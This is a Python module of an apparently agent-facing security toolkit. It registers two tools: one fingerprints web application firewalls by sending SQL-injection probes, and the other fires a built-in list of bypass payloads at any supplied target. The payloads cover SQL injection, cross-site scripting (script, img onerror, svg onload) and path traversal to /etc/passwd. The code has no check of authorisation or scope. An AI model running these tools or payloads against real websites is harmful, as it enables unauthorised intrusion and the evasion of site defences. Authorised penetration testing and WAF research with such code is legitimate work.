"""WAF (Web Application Firewall) detection & bypass assistant."""
import asyncio, httpx
from .mcp_registry import registry

WAF_SIGNATURES = {
    "Cloudflare": {"headers": ["cf-ray", "__cfduid", "cf-cache-status"], "status": [403, 503]},
    "AWS WAF": {"headers": ["x-amzn-requestid", "x-amz-cf-id"], "body": ["request has been blocked"]},
    "Akamai": {"headers": ["x-akamai-transformed", "akamai-origin-hop"], "status": [403]},
    "Imperva/Incapsula": {"headers": ["x-iinfo", "x-cdn", "incap_ses"], "body": ["incapsula"]},
    "Sucuri": {"headers": ["x-sucuri-id", "x-sucuri-cache"], "body": ["sucuri"]},
    "F5 BIG-IP": {"headers": ["x-wa-info"], "body": ["the requested url was rejected"], "cookie": ["BIGipServer"]},
    "Barracuda": {"headers": ["barracuda"], "body": ["barracuda"]},
    "Fortinet/FortiWeb": {"headers": ["fortigate"], "body": ["fortiwaf", "the server is temporarily unable"]},
    "ModSecurity": {"body": ["mod_security", "this error was generated by mod_security"]},
    "Wordfence": {"body": ["wordfence", "generated by wordfence"]},
    "Cloudbric": {"headers": ["cloudbric"]},
    "Citrix NetScaler": {"headers": ["citrix", "ns_af"], "cookie": ["ns_af"]},
    "Radware": {"headers": ["x-sl-compstate"]},
}


WAF_BYPASS_PAYLOADS = [
    # SQLi bypasses
    ("SQLi Comment Obfuscation", "1'/**/OR/**/1=1--"),
    ("SQLi Case Variation", "1' oR 1=1--"),
    ("SQLi URL Encoding", "1%27%20OR%201%3D1--"),
    ("SQLi Double URL Encoding", "1%2527%2520OR%25201%253D1--"),
    ("SQLi Unicode", "1′ OR 1=1--"),
    # XSS bypasses
    ("XSS Mixed Case", "<ScRiPt>alert(1)</sCrIpT>"),
    ("XSS HTML Entities", "&lt;script&gt;alert(1)&lt;/script&gt;"),
    ("XSS Null Byte", "<script%00>alert(1)</script>"),
    ("XSS IMG Tags", "<img src=x onerror=alert(1)>"),
    ("XSS SVG", "<svg/onload=alert(1)>"),
    # Path traversal bypasses
    ("Path Double Encoding", "..%252f..%252f..%252fetc/passwd"),
    ("Path Unicode", "..%c0%af..%c0%af..%c0%afetc/passwd"),
]


async def detect_waf(target: str) -> dict:
    """Detect which WAF is protecting a target."""
    try:
        # Send a potentially malicious request to trigger WAF
        malicious_url = f"{target.rstrip('/')}/?id=1' OR '1'='1"
        async with httpx.AsyncClient(timeout=10, follow_redirects=False) as c:
            r = await c.get(malicious_url, headers={
                "User-Agent": "Kemi-WAFDetect/6.1",
                "X-Forwarded-For": "127.0.0.1' OR 1=1--"
            })
            
            html = (r.text or "").lower()
            headers_lower = {k.lower(): str(v).lower() for k, v in r.headers.items()}
            cookies_lower = str(r.headers.get("set-cookie", "")).lower()
            combined = html + " " + str(headers_lower) + " " + cookies_lower
            
            detected_wafs = []
            details = {}
            
            for waf_name, sigs in WAF_SIGNATURES.items():
                score = 0
                matched = []
                for sig_type, patterns in sigs.items():
                    if sig_type == "headers":
                        for h in patterns:
                            if h in combined:
                                score += 2
                                matched.append(f"header:{h}")
                    elif sig_type == "body" and html:
                        for b in patterns:
                            if b in html:
                                score += 2
                                matched.append(f"body:{b}")
                    elif sig_type == "cookie" and cookies_lower:
                        for ck in patterns:
                            if ck.lower() in cookies_lower:
                                score += 2
                                matched.append(f"cookie:{ck}")
                    elif sig_type == "status":
                        if r.status_code in patterns:
                            score += 1
                            matched.append(f"status:{r.status_code}")
                
                if score >= 2:
                    detected_wafs.append(waf_name)
                    details[waf_name] = {"score": score, "matches": matched}
            
            return {
                "target": target, "status": r.status_code,
                "waf_detected": len(detected_wafs) > 0,
                "wafs": detected_wafs, "details": details,
                "bypass_payloads": WAF_BYPASS_PAYLOADS if detected_wafs else [],
                "headers": dict(r.headers),
            }
    except Exception as e:
        return {"error": str(e), "target": target, "waf_detected": False}


async def waf_bypass_test(target: str, param: str = "id") -> dict:
    """Test WAF bypass payloads against a target."""
    results = []
    for name, payload in WAF_BYPASS_PAYLOADS:
        try:
            url = f"{target.rstrip('/')}/?{param}={payload}"
            async with httpx.AsyncClient(timeout=8) as c:
                r = await c.get(url)
                bypassed = r.status_code == 200 and "blocked" not in (r.text or "").lower()[:500]
                results.append({"payload_name": name, "payload": payload, "status": r.status_code, "bypassed": bypassed})
        except:
            results.append({"payload_name": name, "error": "connection failed"})
    
    return {"target": target, "param": param, "tested": len(results), "bypassed": sum(1 for r in results if r.get("bypassed"))}


registry.register("detect_waf", "Detect Web Application Firewall protecting a target",
                  {"target": "str"}, detect_waf)
registry.register("waf_bypass_test", "Test WAF bypass payloads against a target",
                  {"target": "str", "param": "str"}, waf_bypass_test)
